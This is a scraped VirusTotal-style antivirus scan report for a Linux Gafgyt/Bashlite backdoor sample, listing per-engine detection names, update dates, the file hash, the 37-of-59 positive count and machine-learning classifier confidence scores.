Comodo result: UnclassifiedMalware

update: 20170807 version: 27567 detected: True

F-Prot update: 20170807

Ikarus result: Trojan.Linux.Gafgyt

McAfee result: RDN/Generic BackDoor

Rising result: Backdoor.Gafgyt/Linux!1.A512 (classic) update: 20170807

Sophos result: Linux/DDoS-BI

update: 20170807 version: 4.98.0 detected: True

Yandex update: 20170801

Zillya update: 20170806

(14)

Arcabit result: Trojan.Backdoor.Linux.Gafgyt.1 update: 20170807

Tencent result: Linux.Backdoor.Gafgyt.Hpb

ViRobot update: 20170807

Webroot update: 20170807

Ad-Aware result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807

AegisLab result: Backdoor.Linux.Gafgyt!c

update: 20170807 version: 4.2 detected: True

Emsisoft result: Gen:Variant.Backdoor.Linux.Gafgyt.1 (B) update: 20170807

F-Secure result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807

Fortinet result: Linux/Gafgyt.B!tr

Jiangmin result: Backdoor.Linux.gbi

update: 20170807 version: 16.0.100 detected: True

(15)

Kingsoft update: 20170807 version: 2013.8.14.323 detected: False

Symantec result: Linux.Lightaidra

nProtect update: 20170807

version: 2017-08-07.02 detected: False

AhnLab-V3 result: Linux/Gafgyt.Gen

Antiy-AVL result: Trojan[Backdoor]/Linux.Gafgyt.f update: 20170807

Kaspersky result: HEUR:Backdoor.Linux.Gafgyt.ac update: 20170807

Microsoft result: DDoS:Linux/Lightaidra update: 20170807

Qihoo-360 result: Win32/Backdoor.263

TheHacker update: 20170806

version: 6.8.0.5.1813 detected: False

ZoneAlarm result: HEUR:Backdoor.Linux.Gafgyt.ac update: 20170807

version: 1.0 detected: True

(16)

ESET-NOD32 result: a variant of Linux/Gafgyt.C update: 20170807

version: 15873 detected: True

TrendMicro result: ELF_BASHLITE.SMC

WhiteArmor update: 20170731

detected: False

BitDefender result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807

K7AntiVirus update: 20170807

version: 10.20.24214 detected: False

Malwarebytes update: 20170807

TotalDefense update: 20170807

CAT-QuickHeal result: Exploit.Linux.Shellshock.A update: 20170807

NANO-Antivirus result: Trojan.Unix.Gafgyt.eikqfj update: 20170807

MicroWorld-eScan result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807

(17)

SUPERAntiSpyware update: 20170807 version: 5.6.0.1032 detected: False

McAfee-GW-Edition result: RDN/Generic BackDoor update: 20170807

version: v2015 detected: True

TrendMicro-HouseCall result: ELF_BASHLITE.SMC update: 20170807

total 59

sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284 c8f

scan_id 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284 c8f-1502107407

resource 08c3bf87ff0a26ac3e65f10ff1516655

permalink https://www.virustotal.com/file/0a87649048685b881f1ec96cc1ed9f2d9e66 29e62bb0337b39633da9e3284c8f/analysis/1502107407/

positives 37

scan_date 2017-08-07 12:03:27

verbose_msg Scan finished, information embedded

response_code 1

Binary

RF confidence: 100.00%

suspicious: True

MLP confidence: 99.98%

SVM confidence: 98.80%